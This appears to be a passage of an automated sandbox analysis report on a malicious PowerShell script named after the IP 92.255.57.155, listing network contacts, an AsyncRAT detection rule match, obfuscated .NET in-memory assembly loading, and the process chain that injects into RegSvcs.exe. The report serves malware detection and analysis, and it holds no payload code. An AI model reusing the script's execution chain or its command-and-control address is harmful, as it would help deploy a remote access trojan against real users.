          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.155
          Source: powershell.exe, 00000000.00000002.1680199968.000001B58AA09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1691262828.000001B599316000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000000.00000002.1680199968.000001B589398000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1699213925.000001B5A128D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000000.00000002.1680199968.000001B589171000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.0000000002821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: Amcache.hve.10.drString found in binary or memory: http://upx.sf.net
          Source: powershell.exe, 00000000.00000002.1680199968.000001B589398000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1699213925.000001B5A128D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000000.00000002.1680199968.000001B589171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 00000000.00000002.1691262828.000001B599316000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000000.00000002.1691262828.000001B599316000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000000.00000002.1691262828.000001B599316000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000000.00000002.1680199968.000001B589398000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1699213925.000001B5A128D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000000.00000002.1680199968.000001B58A454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 00000000.00000002.1680199968.000001B58AA09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1691262828.000001B599316000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

          System Summary

          barindex
          Source: 00000003.00000002.3280175291.0000000002821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
          Source: Process Memory Space: RegSvcs.exe PID: 5252, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess Stats: CPU usage > 49%
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B980FA40_2_00007FFD9B980FA4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B3E0A03_2_00B3E0A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B3406D3_2_00B3406D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B381403_2_00B38140
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B361483_2_00B36148
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B3F2883_2_00B3F288
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B323493_2_00B32349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B364233_2_00B36423
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B376003_2_00B37600
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B3C7D83_2_00B3C7D8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B3E8A83_2_00B3E8A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B378303_2_00B37830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B36A283_2_00B36A28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B37A183_2_00B37A18
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B3FB023_2_00B3FB02
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B36E283_2_00B36E28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B30F883_2_00B30F88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B3BF083_2_00B3BF08
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B3E0913_2_00B3E091
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B3613B3_2_00B3613B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B381253_2_00B38125
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B351503_2_00B35150
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B351403_2_00B35140
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B342E83_2_00B342E8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B342DB3_2_00B342DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B362673_2_00B36267
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B375F03_2_00B375F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B355503_2_00B35550
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B355403_2_00B35540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B346B03_2_00B346B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B366A03_2_00B366A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B346A03_2_00B346A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B336E03_2_00B336E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B336D03_2_00B336D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B3F7503_2_00B3F750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B3F7413_2_00B3F741
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B3E82F3_2_00B3E82F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B3E8433_2_00B3E843
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B36A183_2_00B36A18
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B3BBC03_2_00B3BBC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B32B503_2_00B32B50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B32B403_2_00B32B40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B34DA83_2_00B34DA8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B34D9B3_2_00B34D9B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B36E183_2_00B36E18
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B30F003_2_00B30F00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00B37F053_2_00B37F05
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_04D434103_2_04D43410
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_04D42DE83_2_04D42DE8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_04D406D03_2_04D406D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_04D40EF83_2_04D40EF8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_04D479483_2_04D47948
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_04D409633_2_04D40963
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_04D484673_2_04D48467
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_04D406C03_2_04D406C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_04D48E503_2_04D48E50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_04D40FAE3_2_04D40FAE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_04D48ADF3_2_04D48ADF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_04D48A8A3_2_04D48A8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_04D48A633_2_04D48A63
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_04D483BF3_2_04D483BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_04D48B1F3_2_04D48B1F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5252 -s 1736
          Source: 00000003.00000002.3280175291.0000000002821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
          Source: Process Memory Space: RegSvcs.exe PID: 5252, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
          Source: 0.2.powershell.exe.1b599389800.4.raw.unpack, -----------------------------------------.csCryptographic APIs: 'CreateDecryptor'
          Source: 0.2.powershell.exe.1b599389800.4.raw.unpack, -----------------------------------------.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.powershell.exe.1b599389800.4.raw.unpack, -----------------------------------------.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.powershell.exe.1b599389800.4.raw.unpack, -----------------------------------------.csCryptographic APIs: 'CreateDecryptor'
          Source: classification engineClassification label: mal100.troj.evad.winPS1@7/10@0/1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5252
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\o8kSNczORMveFDjV
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6844:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nnwuctoj.gsi.ps1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
          Source: 92.255.57.155.ps1Virustotal: Detection: 8%
          Source: 92.255.57.155.ps1ReversingLabs: Detection: 13%
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.155.ps1"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5252 -s 1736
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdnsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: Binary string: nC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbT source: RegSvcs.exe, 00000003.00000002.3287746347.000000000A7FB000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: System.Xml.ni.pdb source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.PDBs source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000C32000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdbSystem.Management.ni.dll source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.3286181835.0000000004F60000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.ni.pdbRSDS source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: \??\C:\Windows\exe\RegSvcs.pdbX source: RegSvcs.exe, 00000003.00000002.3286181835.0000000004F60000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: n.pdb source: RegSvcs.exe, 00000003.00000002.3287746347.000000000A7FB000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: n0C:\Windows\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.3287746347.000000000A7FB000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000C32000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.1680199968.000001B58A454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1680199968.000001B589398000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1701713981.000001B5A1990000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: System.Configuration.ni.pdb source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.ni.pdbRSDS source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdbs source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000C32000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Configuration.pdb source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbUV source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Xml.pdb source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbP source: RegSvcs.exe, 00000003.00000002.3287746347.000000000A7FB000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: System.pdb source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: System.Xml.ni.pdbRSDS# source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: Microsoft.VisualBasic.pdb source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: System.Core.ni.pdb source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: %%.pdb source: RegSvcs.exe, 00000003.00000002.3287746347.000000000A7FB000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: System.Windows.Forms.pdb source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: Microsoft.VisualBasic.pdblX source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdb source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.3286181835.0000000004FA0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3287746347.000000000A7FB000.00000004.00000010.00020000.00000000.sdmp, WERD6CE.tmp.dmp.10.dr
          Source: Binary string: System.Configuration.pdbMZ source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: System.Windows.Forms.pdb\mbqD0 source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdb?U% source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Drawing.pdb source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: System.Management.pdb source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: mscorlib.ni.pdb source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: \??\C:\Windows\RegSvcs.pdb source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.ni.pdb source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: System.Core.pdb source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: symbols\dll\mscorlib.pdbLb source: RegSvcs.exe, 00000003.00000002.3287746347.000000000A7FB000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\exe\RegSvcs.pdb source: RegSvcs.exe, 00000003.00000002.3286181835.0000000004F60000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdb246122658-3693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: RegSvcs.exe, 00000003.00000002.3286181835.0000000004F60000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: System.ni.pdb source: WERD6CE.tmp.dmp.10.dr
          Source: Binary string: System.Core.ni.pdbRSDS source: WERD6CE.tmp.dmp.10.dr

          Data Obfuscation

          barindex
          Source: 0.2.powershell.exe.1b599389800.4.raw.unpack, -----------------------------------------.cs.Net Code: _202B_200C_206B_202B_200F_202E_206A_206B_206F_206A_206F_206D_206B_206B_202B_202E_200B_200D_206C_202C_200E_200C_206B_202B_200C_200E_202E_200B_202A_200D_200C_206E_200B_206E_206E_202A_200B_206D_202A_202C_202E System.AppDomain.Load(byte[])
          Source: 0.2.powershell.exe.1b599389800.4.raw.unpack, -Module-.cs.Net Code: _202B_202D_200B_200C_202A_206F_206C_206C_200E_200E_202C_206B_200B_200E_202B_202B_200B_206B_200E_206D_206C_202B_200C_206F_206C_202A_200F_206F_206F_202D_206C_206A_206B_206E_202A_200C_202E_206A_200D_200F_202E System.Reflection.Assembly.Load(byte[])
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B8B8D84 pushad ; ret 0_2_00007FFD9B8B8D86

          Persistence and Installation Behavior

          barindex
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
